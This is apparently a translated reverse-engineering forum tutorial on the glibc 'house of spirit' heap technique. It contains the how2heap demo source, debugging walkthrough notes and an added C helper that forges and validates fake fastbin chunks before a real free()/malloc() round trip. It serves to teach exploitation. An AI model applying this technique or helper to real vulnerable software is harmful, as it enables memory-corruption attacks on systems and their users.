学逆向论坛
Posted 2020-9-2 09:52:52 | Views: 2674 | Replies: 0

Related challenges:

Source (how2heap's house_of_spirit.c; the header names were lost in extraction and are restored here)

  #include <stdio.h>
  #include <stdlib.h>

  int main()
  {
      fprintf(stderr, "This file demonstrates the house of spirit attack.\n");
      fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
      malloc(1);
      fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
      unsigned long long *a;
      // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
      unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
      fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);
      fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
      fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
      fake_chunks[1] = 0x40; // this is the size
      fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
      // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
      fake_chunks[9] = 0x1234; // nextsize
      fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
      fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
      a = &fake_chunks[2];
      fprintf(stderr, "Freeing the overwritten pointer.\n");
      free(a);
      fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
      fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
  }

Output

[screenshot: house_of_spirit]
Analysis & debugging
The idea is simply to fake a chunk on the stack, free it, and then the next malloc of that size hands back the stack memory.
Debugging:
At the start, malloc(1) is called first so that malloc initialises its state:

[screenshot: house_of_spirit]
Then a pointer variable a and the array fake_chunks[10] (16-byte aligned) are declared:
At this point a is 0 and sits at 0x7fffffffdc18;
fake_chunks is at 0x7fffffffdc20, immediately after a.

[screenshot: house_of_spirit]
Next we fake the chunks.
First fake_chunks[1] = 0x40: this is the forged size field of the first fake chunk, i.e. a chunk size of 0x40 (fake_chunks[0] is where prev_size would be).

[screenshot: house_of_spirit]
Then fake_chunks[9] = 0x1234: this is the forged size field of the second fake chunk (the first chunk is 0x40 bytes long and 0x40 / sizeof(unsigned long long) = 8, so the next size field lands at index 1 + 8 = 9).
At this point both chunk sizes are in place.

[screenshot: house_of_spirit]
Next, a is set to the mem pointer of the first fake chunk, &fake_chunks[2] = 0x7fffffffdc30 (16 bytes past the chunk header at fake_chunks[0..1]), so a now points at our fake chunk.

[screenshot: house_of_spirit]
Then we free(a)
and the fake chunk shows up in the fastbin:

[screenshot: house_of_spirit]
So if we now malloc the same size again, malloc returns the memory on the stack: our fake chunk is handed out.

[screenshot: house_of_spirit]
Summary
  • When a stack overflow lets us overwrite a pointer that is about to be freed, we can point it at a stack address where we have forged a chunk; after the free, a malloc of the same size returns that fake chunk.
  • Of the three flag bits in the size field, IS_MMAPPED and NON_MAIN_ARENA must be 0 (PREV_INUSE is ignored for fastbin-sized chunks); otherwise free() never reaches the fastbin path.
  • size itself must be in the fastbin range (<= 0x80 on x64) and must equal the rounded-up size of the malloc request that is to return the chunk (0x30..0x38 all round to 0x40).
  • The next chunk's size must also satisfy > 2*SIZE_SZ && < system_mem, otherwise free() aborts with "invalid next size (fast)". (On 64-bit that means 16 bytes < nextsize < 128 KB.)
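Added example (not from the post or from how2heap; the hos_* names and the x86-64 glibc constants are our assumptions): a small C helper that lays out a fake chunk for a given malloc() request and replays the free() checks listed above, so a candidate fake chunk can be validated before the real free() is risked. Its main() then runs the actual free()/malloc() round trip. One caveat a practitioner should know: on glibc 2.26 and later, free() puts a fastbin-sized chunk into tcache before the fastbin code is reached, so the next-size check is not performed there at all, and malloc(0x30) still returns the fake chunk (the screenshots above show the older fastbin path).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* x86-64 glibc defaults (assumed): SIZE_SZ 8, 16-byte alignment, MINSIZE 0x20, global_max_fast 0x80. */
#define SIZE_SZ            sizeof(size_t)
#define MALLOC_ALIGN_MASK  (2 * SIZE_SZ - 1)
#define MINSIZE            (4 * SIZE_SZ)
#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
#define PREV_INUSE         0x1
#define IS_MMAPPED         0x2
#define NON_MAIN_ARENA     0x4
#define SIZE_BITS          (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

enum hos_result {
    HOS_OK = 0,
    HOS_MISALIGNED,   /* mem not 16-byte aligned */
    HOS_MMAPPED,      /* IS_MMAPPED set: free() would munmap() instead */
    HOS_NON_MAIN,     /* NON_MAIN_ARENA set: arena looked up from a bogus heap header */
    HOS_BAD_SIZE,     /* size < MINSIZE or misaligned: "free(): invalid size" */
    HOS_NOT_FAST,     /* size > global_max_fast: not a fastbin chunk */
    HOS_BAD_NEXTSIZE  /* "free(): invalid next size (fast)" */
};

/* The rounding glibc applies to a malloc() argument: 0x29..0x38 -> 0x40. */
size_t hos_request2size(size_t req)
{
    size_t sz = req + SIZE_SZ + MALLOC_ALIGN_MASK;
    return sz < MINSIZE ? MINSIZE : (sz & ~MALLOC_ALIGN_MASK);
}

/* Replays the checks free() applies to a fastbin-sized chunk whose user
 * pointer is mem; system_mem stands in for av->system_mem. */
enum hos_result hos_check_fake(const void *mem, size_t system_mem)
{
    const unsigned char *chunk = (const unsigned char *)mem - 2 * SIZE_SZ;
    size_t raw, size, next_raw;
    if ((uintptr_t)mem & MALLOC_ALIGN_MASK)
        return HOS_MISALIGNED;
    memcpy(&raw, chunk + SIZE_SZ, SIZE_SZ);          /* chunk->size, flags included */
    if (raw & IS_MMAPPED)
        return HOS_MMAPPED;
    if (raw & NON_MAIN_ARENA)
        return HOS_NON_MAIN;
    size = raw & ~(size_t)SIZE_BITS;                  /* PREV_INUSE is simply ignored */
    if (size < MINSIZE || (size & MALLOC_ALIGN_MASK))
        return HOS_BAD_SIZE;
    if (size > DEFAULT_MXFAST)
        return HOS_NOT_FAST;
    /* glibc tests the unmasked next size against 2*SIZE_SZ and the masked one against system_mem. */
    memcpy(&next_raw, chunk + size + SIZE_SZ, SIZE_SZ);
    if (next_raw <= 2 * SIZE_SZ || (next_raw & ~(size_t)SIZE_BITS) >= system_mem)
        return HOS_BAD_NEXTSIZE;
    return HOS_OK;
}

/* Lays out a fake chunk at buf for a later malloc(request): size at buf+8, the next chunk's
 * size at buf+size+8. Returns the pointer to hand to free() (buf+16) or NULL if it cannot fit. */
void *hos_build_fake(unsigned char *buf, size_t buflen, size_t request, size_t nextsize)
{
    size_t size = hos_request2size(request);
    if (((uintptr_t)buf & MALLOC_ALIGN_MASK) || size > DEFAULT_MXFAST ||
        buflen < size + 2 * SIZE_SZ)
        return NULL;
    memcpy(buf + SIZE_SZ, &size, SIZE_SZ);
    memcpy(buf + size + SIZE_SZ, &nextsize, SIZE_SZ);
    return buf + 2 * SIZE_SZ;
}

/* Builds a fake chunk in a scratch buffer, ORs flags into its size field and runs the checks. */
enum hos_result hos_probe(size_t request, size_t nextsize, size_t flags)
{
    static unsigned char scratch[0x100] __attribute__((aligned(16)));
    size_t size;
    void *mem = hos_build_fake(scratch, sizeof scratch, request, nextsize);
    if (mem == NULL)
        return HOS_NOT_FAST;
    memcpy(&size, scratch + SIZE_SZ, SIZE_SZ);
    size |= flags;
    memcpy(scratch + SIZE_SZ, &size, SIZE_SZ);
    return hos_check_fake(mem, 128 * 1024);
}

int main(void)
{
    unsigned char region[0x50] __attribute__((aligned(16))) = {0}; /* stack memory we control */
    char *victim = malloc(0x30);   /* the pointer an overflow would later corrupt */
    void *fake = hos_build_fake(region, sizeof region, 0x30, 0x1234);
    printf("fake mem %p, pre-check %d (0 = OK)\n", fake, hos_check_fake(fake, 128 * 1024));
    victim = fake;                 /* stands in for the overwritten pointer */
#if defined(__GLIBC__)
    free(victim);                  /* tcache on glibc >= 2.26, fastbin before that */
    void *got = malloc(0x30);
    printf("malloc(0x30) = %p -> %s\n", got, got == fake ? "stack region handed out" : "miss");
#else
    (void)victim;
    puts("not glibc: skipping the real free()/malloc() round trip");
#endif
    return 0;
}
```

hos_probe() is the quick way to confirm the rules from the summary: a stray PREV_INUSE bit is harmless, IS_MMAPPED or NON_MAIN_ARENA is fatal, a next size of 0x10 or of 128 KB fails, and a request of 0x80 rounds to 0x90 and is no longer fastbin-sized.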

